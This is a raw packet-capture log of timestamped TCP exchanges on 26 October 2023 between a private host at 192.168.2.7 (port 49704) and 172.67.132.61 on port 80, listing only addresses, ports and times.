                                                                              Oct 26, 2023 09:45:55.244246960 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.244566917 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.244616032 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.244662046 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.244708061 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.244755030 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.244800091 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.244920969 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.244968891 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.244986057 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.245029926 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.245584965 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.245634079 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.245656967 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.245702982 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.245718956 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.245763063 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.245764017 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.245809078 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.246611118 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.246661901 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.246675968 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.246726990 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.246794939 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.246840954 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.247198105 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.247246027 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.250123024 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.250184059 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.251184940 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.251235008 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.251239061 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.251276970 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.251306057 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.251352072 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.251384020 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.251425982 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.252007961 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.252058029 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.252723932 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.252772093 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.329873085 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.329937935 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.330008030 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.330009937 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.330046892 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.330053091 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.330095053 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.330102921 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.330121994 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.330169916 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.330495119 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.330545902 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.330712080 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.330791950 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.330813885 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.330837011 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.330852985 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.330899954 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.330921888 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.330967903 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.330991030 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.331033945 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.331056118 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.331104040 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.331255913 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.331305981 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.331347942 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.331393957 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.331415892 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.331461906 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.331518888 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.331566095 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.331588984 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.331638098 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.331659079 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.331712008 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.331748962 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.331795931 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.331818104 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.331890106 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.331912041 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.331955910 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.332026958 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.332073927 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.332113028 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.332170010 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.332237005 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.332283974 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.332365990 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.332468033 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.410711050 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.410748005 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.410772085 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.410793066 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.410837889 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.410870075 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.410878897 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.410931110 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.410968065 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.410976887 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.411632061 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.411694050 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.411727905 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.411756039 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.411807060 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.412034988 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.412164927 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.412215948 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.412439108 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.412554979 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.412605047 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.413075924 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.413197994 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.413243055 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.413254976 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.413283110 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.413328886 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.413484097 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.413544893 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.413597107 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.413604975 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.413862944 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.413911104 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.413911104 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.414031029 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.414077044 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.414088011 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.414164066 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.414215088 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.495023966 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.495054960 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.495074034 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.495146990 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.495157957 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.495197058 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.495202065 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.495271921 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.495290041 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.495340109 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.495351076 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.495398045 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.495537043 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.495682955 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.495728970 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.495737076 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.495771885 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.495810986 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.495841026 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.495876074 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.495923996 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.496332884 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.496356010 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.496402025 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.496470928 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.496527910 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.496576071 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.496644974 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.496661901 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.496702909 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.496747971 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.497423887 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.497473001 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.497531891 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.497567892 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.497612000 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.497617006 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.497634888 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.497675896 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.592015028 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.592045069 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.592065096 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.592109919 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.592209101 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.592228889 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.592253923 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.592303991 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.592346907 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.592377901 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.592396975 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.592447042 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.592478037 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.592561960 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.592633009 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.592647076 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.592677116 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.592720985 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.592746973 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.592782021 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.592830896 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.592835903 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.592900038 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.592941999 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.592956066 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.592992067 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.593036890 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.593050003 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.593108892 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.593151093 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.593173981 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.593229055 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.593271971 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.593293905 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.593328953 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.593369961 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.593380928 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.593441010 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.593514919 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.677026987 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.677078009 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.677098036 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.677118063 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.677136898 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.677156925 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.677167892 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.677206039 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.677213907 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.677279949 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.677299976 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.677333117 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.677355051 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.677390099 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.677407980 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.677484989 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.677519083 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.677522898 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.677601099 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.677644968 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.678211927 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.678230047 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.678271055 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.678355932 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.678411961 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.678458929 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.678507090 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.678606033 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.678647041 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.678666115 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.679363012 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.679409027 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.679409981 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.679467916 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.679514885 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.679536104 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.679553986 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.679609060 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.847639084 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.847661018 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.847677946 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.847739935 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.847743988 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.847788095 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.847789049 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.847831011 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.847871065 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.847889900 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.847991943 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.848035097 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.848038912 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.848073959 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.848109961 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.848141909 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.848189116 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.848232031 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.848249912 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.848284006 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.848328114 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.848925114 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.849000931 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.849044085 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.849047899 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.849085093 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.849127054 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.849138975 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.849173069 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.849212885 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.849241972 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.849873066 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.849917889 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.849929094 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.849987984 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.850030899 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:55.850075960 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.850094080 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:55.850131035 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.025964022 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.025995970 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.026015997 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.026036978 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.026072979 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.026124954 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.026153088 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.026153088 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.026170015 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.026173115 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.026242018 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.026281118 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.026302099 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.026406050 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.026451111 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.026452065 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.026510954 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.026530981 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.026554108 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.026585102 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.026629925 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.027153969 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.027208090 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.027246952 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.027247906 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.027316093 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.027333975 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.027358055 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.027388096 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.027431011 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.027462959 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.028126001 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.028172016 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.028259039 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.028300047 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.028342962 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.028346062 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.028376102 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.028419018 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.112658978 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.112689018 CEST8049704172.67.132.61192.168.2.7
